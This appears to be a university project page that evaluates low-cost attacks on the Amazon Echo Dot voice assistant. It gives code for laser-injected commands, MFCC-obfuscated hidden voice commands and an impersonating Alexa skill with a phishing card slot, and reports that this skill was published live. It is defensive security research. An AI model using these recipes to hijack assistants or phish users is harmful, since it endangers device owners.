The Security and Privacy of Smart Speakers

A smart speaker, such as the Amazon Echo or Google Home, is a speaker with a voice-controlled intelligent virtual assistant that offers hands-free interaction. Unlike early voice-activated technologies, which only worked with a limited set of assigned commands, smart speakers are activated by a hot word and then listen for a wide range of commands and questions. Powered by natural language processing and machine learning, this technology brings great convenience to users' daily lives and has contributed to the popularity of smart speakers; it is believed that around 10% of consumers worldwide own one. However, this convenience also introduces a number of security and privacy issues. The most obvious concern is whether the smart speaker is always listening and recording user conversations, in which case it could be abused as a wiretap. This project studies the security and privacy issues associated with smart speakers and provides a practical evaluation of existing attacks that can be carried out at low cost.

Existing Attacks

  • Acoustic Attacks
    • Use an in-house Bluetooth speaker to play recorded user instructions that control the smart speaker
    • Defence: VSButton uses Wi-Fi technology to detect indoor human motion (e.g. waving a hand over 0.2 m) and only enables the microphone when motion is detected
  • Inaudible Attacks
    • Point a laser beam at the microphone; the recorded user instructions are encoded onto the laser beam through a laser diode current driver (a minimal modulation sketch appears after this list)
    • Defence: physical blocks over the microphone to block light beams, e.g. a half-transparent plate or a movable shutter
  • Skill Squatting Attacks
    • Register a skill with a similar name so that the attacker's skill is invoked instead of the skill the user intended
    • Defence: skill names must be unique; avoid confusingly similar names (e.g. merely adding "please" before or after an existing skill name) — see the name-similarity sketch after this list
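
As a rough illustration of the light commands idea above, the sketch below (Python with numpy and scipy, assumed available) converts a recorded voice command into a biased drive signal suitable for an amplitude-modulated laser diode driver. The file name, DC bias, and modulation depth are illustrative assumptions, not values from the original attack.

```python
# Minimal sketch: prepare a voice command as an amplitude-modulation
# signal for a laser diode current driver (illustrative values only).
import numpy as np
from scipy.io import wavfile

RATE, audio = wavfile.read("ok_google_command.wav")   # hypothetical recording
audio = audio.astype(np.float64)
audio /= np.max(np.abs(audio))                        # normalise to [-1, 1]

DC_BIAS = 0.6      # assumed operating point of the diode driver (fraction of full scale)
MOD_DEPTH = 0.3    # assumed modulation depth; keeps the drive signal positive

drive = DC_BIAS + MOD_DEPTH * audio                   # intensity-modulated drive signal
drive = np.clip(drive, 0.0, 1.0)                      # never drive the diode negative

# Write the drive waveform out so it can be played through a sound card into
# the headphone amplifier / current driver chain described above.
wavfile.write("laser_drive.wav", RATE, (drive * 32767).astype(np.int16))
```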
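
For the skill squatting defence above, a skill registry could flag confusingly similar invocation names before approval. The sketch below uses only Python's standard-library difflib; the 0.8 threshold and the candidate names are assumptions for illustration, with "simon says" taken from the Simon Says example used later in this project.

```python
# Minimal sketch: flag proposed skill invocation names that are confusingly
# similar to existing ones (threshold chosen for illustration only).
from difflib import SequenceMatcher

EXISTING_SKILLS = ["simon says"]          # names already registered

def too_similar(proposed: str, existing: str, threshold: float = 0.8) -> bool:
    """Return True if the proposed name is close to, or contains, an existing name."""
    ratio = SequenceMatcher(None, proposed.lower(), existing.lower()).ratio()
    return ratio >= threshold or existing.lower() in proposed.lower()

for candidate in ["the simon says game", "simon says please", "capital quiz"]:
    flagged = any(too_similar(candidate, name) for name in EXISTING_SKILLS)
    print(f"{candidate!r}: {'REJECT - too similar' if flagged else 'ok'}")
```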
Methodology

  • Target: Amazon Echo Dot
    • Affordable, popular, common
  • Attack 1: Light commands
    • Modify the light commands attack to use self-built equipment to minimise the cost
    • Original cost: laser diode current driver (HKD 3000), headphone amplifier (HKD 200), laser diode (HKD 100)
  • Attack 2: Hidden voice commands
    • Generate obfuscated commands recognisable only by machines
    • Trial and error to modify the MFCC (mel-frequency cepstral coefficient) representation to maximise how obfuscated the command can be while it remains recognisable (see the sketch after this list)
  • Attack 3: Skill squatting attack
    • Create a new skill with a name similar to a legitimate one to hijack/impersonate voice commands
    • Utilise the Alexa app card display to demonstrate the possibility of more severe phishing attacks
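
To illustrate the trial-and-error obfuscation step of Attack 2, the sketch below (using the librosa and soundfile libraries, assumed installed) extracts a reduced MFCC representation of a command and resynthesises audio from those coefficients alone; because the inversion discards most fine spectral detail, the result tends to sound garbled to humans while keeping the features a recogniser relies on. The file name and number of coefficients are illustrative assumptions.

```python
# Minimal sketch: obfuscate a voice command by keeping only its MFCC
# representation and resynthesising audio from those coefficients.
import librosa
import soundfile as sf

SR = 16000
N_MFCC = 13                                   # assumed starting point; tuned by trial and error

voice, _ = librosa.load("alexa_command.wav", sr=SR)     # hypothetical recording
mfcc = librosa.feature.mfcc(y=voice, sr=SR, n_mfcc=N_MFCC)

# Invert the MFCCs back to a waveform; fine spectral detail is lost, which is
# what makes the command hard for humans to understand.
obfuscated = librosa.feature.inverse.mfcc_to_audio(mfcc, sr=SR)

sf.write("obfuscated_command.wav", obfuscated, SR)
# The trial-and-error loop would now play this file to the Echo Dot, check
# whether it is still recognised, and adjust N_MFCC (or add noise) until the
# command is as unintelligible as possible to humans.
```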
Implementation

  • Attack 1: Light commands
    • Laser diode obtained from a recycled PC DVD drive
    • Headphone amplifier and current driver can be built ourselves
    • Unstable for now (the battery overheats and might cause a fire; waiting for additional components to arrive)
  • Attack 2: Hidden voice commands
  • Attack 3: Skill squatting attack
    • Simon Says (legitimate skill: "simon says"; impersonating skill: "the simon says game")
    • Shown to be invoked by users unintentionally (the impersonating skill was published to the Alexa skill store)
    • Demo: first the legitimate skill, then the impersonating skill (deliberately made non-functional so the two can be distinguished easily here); a minimal handler sketch appears after this list
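
For Attack 3, the squatted skill is an ordinary Alexa skill whose invocation name collides with the legitimate one. The sketch below is a minimal Python backend using the Alexa Skills Kit SDK (ask-sdk-core, assumed installed); the speech text and card content are placeholders, and the invocation name ("the simon says game") is configured in the skill manifest rather than in this code.

```python
# Minimal sketch of the impersonating skill's backend: it answers the launch
# request and pushes a card to the Alexa app, the channel used to demonstrate
# a more convincing phishing message.
from ask_sdk_core.skill_builder import SkillBuilder
from ask_sdk_core.dispatch_components import AbstractRequestHandler
from ask_sdk_core.utils import is_request_type
from ask_sdk_model.ui import SimpleCard


class LaunchRequestHandler(AbstractRequestHandler):
    def can_handle(self, handler_input):
        return is_request_type("LaunchRequest")(handler_input)

    def handle(self, handler_input):
        speech = "Welcome to Simon Says."          # mimics the legitimate skill
        card = SimpleCard(
            title="Simon Says",
            content="Placeholder card text - a real attack could show a phishing link here.",
        )
        return (
            handler_input.response_builder
            .speak(speech)
            .set_card(card)
            .response
        )


sb = SkillBuilder()
sb.add_request_handler(LaunchRequestHandler())
lambda_handler = sb.lambda_handler()               # entry point when hosted on AWS Lambda
```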
To Do

    To be completed, in order:

  • Oral examination
In Progress

    Final Report

  • Introduction
  • Background
  • Existing Attacks
  • Methodology and Design
  • Implementation
  • Evaluation
  • Conclusion
Done

    Completed as of 24 Jul

  • Literature review
  • Background information
  • Methodology
  • Implementation
  • Evaluation